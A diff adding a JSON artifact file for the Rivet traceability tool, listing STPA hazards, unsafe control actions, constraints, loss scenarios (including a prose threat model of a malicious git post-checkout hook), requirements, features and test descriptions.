+          "target": "REQ-044",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Three-layer PLE architecture (feature / variant / binding)",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nCore commit analysis fails to extract artifact IDs that use\n\nsub-hazard notation (e.g.,\n\"H-1.2\") or multi-letter suffixes\n\n(e.g.,\n\"UCA-C-10\").\n",
+      "id": "UCA-C-19",
+      "links": [
+        {
+          "target": "H-15",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore WASM runtime does not enforce fuel limits,\nallowing a\n\nmalicious adapter to consume unbounded CPU.\n",
+      "id": "UCA-C-22",
+      "links": [
+        {
+          "target": "H-14",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore does not validate schema conformance for imported artifacts.\n",
+      "id": "UCA-C-3",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "14 artifact types with SIL-dependent rules, tool qualification, independent assessment for railway software.\n",
+      "id": "FEAT-097",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "EN 50128 railway software safety schema",
+      "type": "feature"
+    },
+    {
+      "description": "Imports meld's STPA safety analysis YAML format. Maps losses, hazards, constraints, UCAs, and scenarios to rivet artifacts.\n",
+      "id": "ARCH-ADAPT-STPA",
+      "links": [
+        {
+          "target": "FEAT-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "adapter",
+        "stpa"
+      ],
+      "title": "STPA YAML Adapter",
+      "type": "aadl-component"
+    },
+    {
+      "description": "",
+      "id": "CC-C-20",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-20",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nOSLC client aborts sync mid-operation due to a transient\n\nnetwork error,\nleaving the local store in a partial state.\n",
+      "id": "UCA-O-10",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore does not detect circular cross-repo dependencies during\n\nexternal artifact loading.\n",
+      "id": "UCA-C-20",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-3",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The MCP stdio transport accepts tool invocations from any process that can pipe to Rivet's stdin. On shared systems, a malicious process could query all project artifacts.\n",
+      "id": "SUCA-MCP-1",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-IMPL-002",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP server accepts tool invocations without authentication",
+      "type": "sec-uca"
+    },
+    {
+      "description": "Core validation algorithms must have formal correctness proofs at three levels. Bounded model checking (Kani) for panic freedom. Functional correctness proofs (Verus) for validation soundness and completeness. Metamodel semantic proofs (Rocq/coq-of-rust) for schema satisfiability and rule consistency. These proofs serve as ISO 26262 tool qualification evidence at TCL 1. Proofs must verify the actual implementation, not a separate model.\n",
+      "id": "REQ-030",
+      "links": [
+        {
+          "target": "SC-14",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-14",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "safety",
+        "tool-qualification"
+      ],
+      "title": "Formal correctness guarantees for validation engine",
+      "type": "requirement"
+    },
+    {
+      "description": "\nCLI does not validate rivet.lock file integrity before using\n\npinned commit SHAs for external sync.\n",
+      "id": "UCA-L-7",
+      "links": [
+        {
+          "target": "H-17",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-14",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "OSLC server URLs referenced in rivet.yaml must be validated against an operator-defined allowlist before Rivet initiates any network connection.  URLs not on the allowlist must cause an immediate error, not a warning, so they cannot be silently used.  The allowlist itself must require an explicit operator action (edit + commit) to modify.\n",
+      "id": "SSC-5",
+      "links": [
+        {
+          "target": "SH-5",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet must validate OSLC server URLs against a configured allowlist",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "\nAn attacker submits a PR that modifies rivet.yaml to add an\n\nexternal dependency pointing to a malicious git repository.\n\nThe repository contains a .git/hooks/post-checkout script that\n\nexfiltrates SSH keys or modifies local source files. A reviewer\n\napproves the PR without noticing the rivet.yaml change. When\n\nany developer runs `rivet sync`,\ngit clones the malicious repo\n\nand the post-checkout hook executes with the developer's\n\npermissions [UCA-L-6].\n",
+      "id": "LS-L-3",
+      "links": [
+        {
+          "target": "UCA-L-6",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-17",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Git clone executes malicious post-checkout hook",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Parses git commit trailers, validates commit-to-artifact links, detects orphan commits, and computes commit coverage metrics.\n",
+      "id": "ARCH-CORE-COMMITS",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-018",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-019",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "git",
+        "traceability"
+      ],
+      "title": "Commit Traceability Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "",
+      "id": "CC-D-4",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-D-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-16",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nCoverage matrices,\nstatistics,\nor dashboards report higher coverage\n\nthan actually exists.  Engineers and auditors rely on these metrics\n\nto judge readiness,\nso inflated metrics hide real traceability gaps.\n",
+      "id": "H-3",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet produces incorrect coverage metrics showing completeness when gaps exist",
+      "type": "hazard"
+    },
+    {
+      "description": "Test-to-requirement links are extracted from source code markers and test results at analysis time, injected as ephemeral nodes into the link graph — the same pattern used for commit traceability (DD-012). No test artifact YAML files are generated.\n",
+      "id": "DD-021",
+      "links": [
+        {
+          "target": "REQ-026",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "testing",
+        "traceability"
+      ],
+      "title": "Ephemeral test nodes via source scanning over materialized YAML",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that baseline/* convention tags exist across all external repositories and that pinned commits in rivet.lock match the tagged commits. Reports mismatches and missing baselines.\n",
+      "id": "FEAT-036",
+      "links": [
+        {
+          "target": "REQ-021",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "baseline",
+        "cli"
+      ],
+      "title": "rivet baseline verify — cross-repo validation",
+      "type": "feature"
+    },
+    {
+      "description": "\nWhen multiple sources modify the same artifact,\nRivet must detect\n\nthe conflict (via timestamps,\nETags,\nor content hashing),\npresent\n\nit to the user,\nand require explicit resolution before committing.\n",
+      "id": "SC-5",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must detect and surface conflicting modifications before merging",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nEvery change to an artifact (create,\nupdate,\ndelete,\nlink change)\n\nmust be attributable to a user or system process,\ntimestamped,\nand\n\npreserved in the git history.  Sync operations must record the\n\nremote source and change event identifier.\n",
+      "id": "SC-7",
+      "links": [
+        {
+          "target": "H-7",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must maintain a complete audit trail for all artifact modifications",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-23",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-23",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-14",
+          "type": "prevents"
+        },
+        {
+          "target": "H-17",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-O-4",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-7",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-L-1",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Goal Structuring Notation for structured safety arguments. 6 artifact types, 5 link types, 4 traceability rules. Bridges to STPA and EU AI Act. Covers UL 4600, ISO/PAS 8800.\n",
+      "id": "FEAT-089",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "GSN safety case schema",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "spar:SPAR-SYS-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "aadl",
+        "system"
+      ],
+      "title": "Top-level system component",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Version switcher dropdown and homepage link populated from config.js at page load.\n",
+      "id": "FEAT-063",
+      "links": [
+        {
+          "target": "REQ-036",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "export",
+        "navigation",
+        "phase-3"
+      ],
+      "title": "Version switcher and homepage link in HTML export via config.js",
+      "type": "feature"
+    },
+    {
+      "description": "Artifact types, fields, link constraints, and traceability rules are defined in mergeable YAML schemas. The tool validates artifacts against loaded schemas.\n",
+      "id": "REQ-010",
+      "links": [
+        {
+          "target": "SC-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-IMPL-005",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "schema"
+      ],
+      "title": "Schema-driven validation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nDeveloper has artifact YAML files open in VS Code with auto-save\n\nenabled.  They run `rivet sync` which writes updated artifacts\n\nto the same files.  VS Code detects the external file change and\n\neither (a) reloads the file,\nlosing the developer's unsaved edits,\n\nor (b) prompts the developer,\nwho accidentally chooses \"overwrite\"\n\nand pushes their stale version back over the sync result.  In\n\neither case,\ndata is lost or corrupted [H-5,\nH-7].\n",
+      "id": "LS-L-1",
+      "links": [
+        {
+          "target": "UCA-L-5",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Sync races with editor file watches",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nEngineers waste significant time on manual traceability repair,\n\ndebugging sync failures,\nor reconciling conflicting artifact versions\n\ninstead of performing value-adding engineering work.\n",
+      "id": "L-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of engineering productivity",
+      "type": "loss"
+    },
+    {
+      "description": "\nReqIF adapter imports artifacts before schema definitions\n\nhave been loaded.\n",
+      "id": "UCA-Q-6",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-12",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-12",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-10",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "CLI command rivet import --format junit that reads JUnit XML test result files and creates rivet TestRun entries in results/. Maps JUnit testcase elements to artifact IDs via naming convention or explicit mapping. Enables CI pipelines to feed test evidence into rivet's traceability chain.\n",
+      "id": "FEAT-071",
+      "links": [
+        {
+          "target": "REQ-040",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "testing",
+        "import",
+        "ci",
+        "future"
+      ],
+      "title": "JUnit XML test result import",
+      "type": "feature"
+    },
+    {
+      "description": "scripts/pre-commit runs cargo fmt and clippy before every commit. Prevents CI format failures.\n",
+      "id": "FEAT-105",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Pre-commit hook for formatting and clippy",
+      "type": "feature"
+    },
+    {
+      "description": "Multiple rivet repositories must be able to form consistent baselines using git tags without requiring a central platform repository.\n",
+      "id": "REQ-021",
+      "links": [
+        {
+          "target": "SC-10",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "baseline"
+      ],
+      "title": "Distributed baselining via convention tags",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests verifying that HTMX and Mermaid JavaScript assets are embedded in the Rust binary via include_str! and served from /assets/htmx.js and /assets/mermaid.js with correct Content-Type and Cache-Control headers. Playwright tests confirm no CDN requests are made.\n",
+      "id": "TEST-012",
+      "links": [
+        {
+          "target": "REQ-022",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "wasm",
+        "assets",
+        "swe-4"
+      ],
+      "title": "WASM asset embedding tests",
+      "type": "feature"
+    },
+    {
+      "description": "Filters and searches artifacts by type, status, tags, and free-text queries.\n",
+      "id": "ARCH-CORE-QUERY",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "query"
+      ],
+      "title": "Query Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Extend schema YAML with conditional-rules block supporting when/then syntax. The \"when\" clause matches field values (equals, matches regex, exists). The \"then\" clause enforces required-fields and required-links. Validation engine evaluates conditional rules after static rules.\n",
+      "id": "FEAT-040",
+      "links": [
+        {
+          "target": "REQ-023",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-018",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "validation",
+        "schema",
+        "phase-3"
+      ],
+      "title": "Conditional validation rules in schema YAML",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe externals sync operation must validate git URLs against an\n\nallowlist or require explicit user confirmation before cloning\n\nnew repositories. Git clone operations must disable hooks in the\n\ncloned repository (--config core.hooksPath=/dev/null) to prevent\n\narbitrary code execution.\n",
+      "id": "SC-19",
+      "links": [
+        {
+          "target": "H-17",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must not execute git clone/fetch against untrusted URLs without hook protection",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nHuman operator who creates and maintains YAML artifact files,\n\ninvokes Rivet CLI commands,\nreviews validation output,\nresolves\n\nconflicts,\nand makes traceability decisions.  May also interact\n\nwith external ALM tools directly.\n",
+      "id": "CTRL-DEV",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Developer / Safety Engineer",
+      "type": "controller"
+    },
+    {
+      "description": "Core algorithms (link graph construction, schema merge, artifact ref parsing, cycle detection, cardinality validation) are verified panic-free via Kani proof harnesses. Kani exhaustively checks all inputs within configurable bounds using CBMC.\n",
+      "id": "DD-025",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "kani"
+      ],
+      "title": "Kani bounded model checking for panic freedom",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe commit traceability engine must not count artifact references\n\nthat do not resolve to known artifacts in the store as coverage.\n\nThe is_artifact_id() heuristic must be supplemented with a\n\nstore.contains() check. Unresolved references must be reported\n\nas broken refs,\nnot counted as coverage.\n",
+      "id": "SC-17",
+      "links": [
+        {
+          "target": "H-15",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet commit analysis must validate extracted artifact IDs against the known artifact set before counting coverage",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Server-side YAML and bash syntax highlighting in the source viewer and documentation pages. Rendered as annotated HTML spans without requiring client-side JavaScript highlighting libraries.\n",
+      "id": "FEAT-027",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ui",
+        "dashboard",
+        "phase-2"
+      ],
+      "title": "Syntax highlighting in dashboard",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn AI coding agent receives a diagnostic from the LSP,\nattempts\n\na fix,\nbut the diagnostic persists because it was either wrong or\n\nthe fix approach was incorrect. The agent retries indefinitely.\n",
+      "id": "L-LSP-003",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "AI agent enters infinite retry loop on wrong diagnostic",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-4",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The test suite is organized into three tiers mirroring ASPICE verification levels: SWE.4 (unit — proptest, Miri, unit tests per module), SWE.5 (integration — cross-module tests, STPA/ASPICE roundtrips), and SWE.6 (qualification — full dogfood validation, benchmark KPI baselines, export fidelity). TEST artifact IDs encode their tier via tags.\n",
+      "id": "DD-036",
+      "links": [
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "aspice",
+        "architecture"
+      ],
+      "title": "ASPICE SWE.4/5/6 three-tier test structure",
+      "type": "design-decision"
+    },
+    {
+      "description": "Unified {{name:arg key=val}} syntax for embedding computed project data in documents. Parser, resolver, and HTML renderers for stats, coverage, diagnostics, and matrix embeds.\n",
+      "id": "FEAT-074",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Computed embed system with EmbedRequest parser",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe rowan-based YAML parser introduces formatting changes,\nreorders\n\nfields,\nalters scalar quoting,\nor drops comments during a\n\nread-modify-write cycle. Artifacts that were previously valid become\n\ninvalid,\nor human-maintained formatting conventions are destroyed.\n",
+      "id": "H-24",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-6",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet YAML round-trip alters artifact content or formatting",
+      "type": "hazard"
+    },
+    {
+      "description": "Static HTML report generation with artifacts, documents, STPA, graph visualization, traceability matrix, and coverage reports.\n",
+      "id": "ARCH-CORE-EXPORT",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-036",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "export"
+      ],
+      "title": "HTML Export Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "The CLI must provide commands to create, modify, remove, link, and unlink artifacts directly, with full schema validation at write time. All mutations must validate the artifact ID is unique (or exists for modify), the type exists in the loaded schema, required fields are present, link targets exist, link types are valid for the source and target types, and status values are in the allowed set. The CLI must write valid YAML that preserves existing file formatting and comments where possible. This eliminates the need for external agents or manual YAML editing to maintain artifacts correctly.\n",
+      "id": "REQ-031",
+      "links": [
+        {
+          "target": "SC-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-2",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "mutation",
+        "validation",
+        "safety"
+      ],
+      "title": "Schema-validated artifact mutation from CLI",
+      "type": "requirement"
+    },
+    {
+      "description": "All relevant CLI commands must accept --variant flags to scope operations to a specific product configuration. This includes validate, coverage, matrix, list, stats, impact, export, and the dashboard API endpoints. The --variant flag composes with existing --type and --status filters. rivet validate without --variant validates the union (all artifacts). rivet validate --variant X validates only the subset bound to variant X's features.\n",
+      "id": "REQ-046",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "cli",
+        "api"
+      ],
+      "title": "Variant-scoped CLI and API commands",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests for the test scanner (FEAT-043). Verifies Rust attribute marker extraction, Python decorator marker extraction, comment tag scanning, JUnit XML result file parsing, cargo test JSON parsing, ephemeral test node injection into the link graph, configurable marker patterns, and coverage report generation via rivet coverage --tests.\n",
+      "id": "TEST-022",
+      "links": [
+        {
+          "target": "REQ-026",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "traceability",
+        "automation",
+        "swe-5"
+      ],
+      "title": "Test traceability source scanner tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nCLI overwrites local YAML files during sync without prompting\n\nthe developer for confirmation.\n",
+      "id": "UCA-L-3",
+      "links": [
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-I-4",
+      "links": [
+        {
+          "target": "CTRL-CI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-I-4",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Export auto-detects the most recent snapshot in snapshots/ by modification time. No rivet.yaml config needed.\n",
+      "id": "DD-043",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Snapshot auto-detection via file system scan",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nArtifact types,\nstatuses,\nor link semantics from external tools\n\n(via ReqIF or OSLC) are mapped incorrectly to Rivet's schema.\n\nA \"verified\" status in Polarion might map to \"approved\" in Rivet,\n\nor a \"refines\" link might be imported as \"satisfies,\" distorting\n\nthe traceability argument.\n",
+      "id": "H-4",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet imports semantically mismatched data from external tools",
+      "type": "hazard"
+    },
+    {
+      "description": "Artifact descriptions rendered as CommonMark HTML via pulldown-cmark with tables, strikethrough, task lists, and code blocks.\n",
+      "id": "REQ-032",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "rendering",
+        "markdown"
+      ],
+      "title": "Markdown rendering in artifact descriptions",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-L-2",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-D-2",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-D-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Adapter that extracts requirement elements from parsed SysML v2 files and generates rivet artifact YAML. Maps SysML v2 satisfy/verify relationships to rivet link types. Enables tracing through SysML v2 (system) → AADL (deployment) → code (implementation).\n",
+      "id": "FEAT-069",
+      "links": [
+        {
+          "target": "REQ-037",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "sysml",
+        "adapter",
+        "future"
+      ],
+      "title": "SysML v2 requirement adapter for rivet",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for the SCORE project schema overlay. Verifies that the score schema merges cleanly with common and aspice schemas, SCORE-specific artifact types (research, benchmark, gap-analysis) validate correctly, ASPICE traceability rules apply to SCORE artifact chains, and coverage metrics compute correctly for SCORE domain artifacts.\n",
+      "id": "TEST-035",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "score",
+        "schema",
+        "swe-5"
+      ],
+      "title": "SCORE schema conformance and ASPICE mapping tests",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for sphinx-needs JSON import adapter (FEAT-042). Verifies needs.json parsing, configurable type-mapping application, id-transform rules, nested content handling, docname metadata preservation, underscore ID conversion, and full roundtrip from needs.json to rivet artifact store.\n",
+      "id": "TEST-021",
+      "links": [
+        {
+          "target": "REQ-025",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "adapter",
+        "interchange",
+        "swe-5"
+      ],
+      "title": "sphinx-needs JSON adapter import tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe snapshot omits diagnostics,\nmiscounts artifacts,\nor\n\nrecords wrong coverage percentages. Delta computation\n\nthen shows incorrect changes.\n",
+      "id": "H-IMPL-001",
+      "links": [
+        {
+          "target": "L-IMPL-001",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Snapshot captures incomplete or corrupted state",
+      "type": "hazard"
+    },
+    {
